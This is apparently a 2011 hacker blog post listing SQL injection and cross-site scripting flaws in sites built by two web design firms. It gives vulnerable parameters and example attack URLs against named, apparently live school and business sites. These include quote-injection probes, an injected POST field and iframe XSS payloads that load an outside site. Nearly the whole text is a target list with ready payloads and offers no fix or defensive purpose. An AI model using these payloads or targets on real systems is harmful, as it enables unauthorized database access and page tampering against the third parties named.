Saturday, October 22, 2011

Light & Shade Creative Studio web design multiple sql injections

Title : Light & Shade Creative Studio web design multiple sql injections
Found : 22 October 2011
Web   : http://www.lnsstudio.com/


[sql]
1 - articles-detail.php?aid=[sql]
2 - notice_detail.php?nid=[sql]
3 - photogallery.php?aid=[sql]
4 - alumni-details.php?batch=[sql]
5 - alumni_students.php?batch=[sql]
6 - more..

Examples :
http://www.fhss.edu.np/articles-detail.php?aid=9'
http://www.shangri-la.edu.np/notice_detail.php?nid=3'
http://www.ops.edu.np/notice_details.php?nid=17'


~/p0pc0rn/~

dreams & ideas web design multiple vulnerabilities

Title : dreams & ideas web design multiple vulnerabilities
Found : 22 October 2011
Web   : http://www.dreamsandideas.com


[sql]
1 - products.php?CatID=[sql]
2 - news_details.php?nid=[sql]
3 - success_story_details.php?sid=[sql]
4 - inside.php?id=[sql]
5 - contact.php?id=[sql]
6 - visaupdate_details.php?vid=[sql]
7 - products.php?BrandID=[sql]
8 - more..

Examples :

http://www.alfabetaedu.com/news_details.php?nid=31'
http://www.neoteric.com.np/products.php?BrandID=2'
http://www.cybersansar.com/article_list.php?pageno=1
POST frdate=2011-10-22&todate=2011-10-22&list_article=-Select-&keyword='&Submit=Submit
http://www.enasha.com/bnb_profile.php?pid=148'


[xss]

1 - search.php
2 - search_result.php?mk=

Examples :
http://www.afn.org.np/search.php
POST keyword=<iframe src=http://www.1337day.com />&search.x=0&search.y=0
http://www.enasha.com/search_result.php?mk=Toyota<iframe src=http://www.1337day.com />



~/p0pc0rn/~

Wednesday, October 12, 2011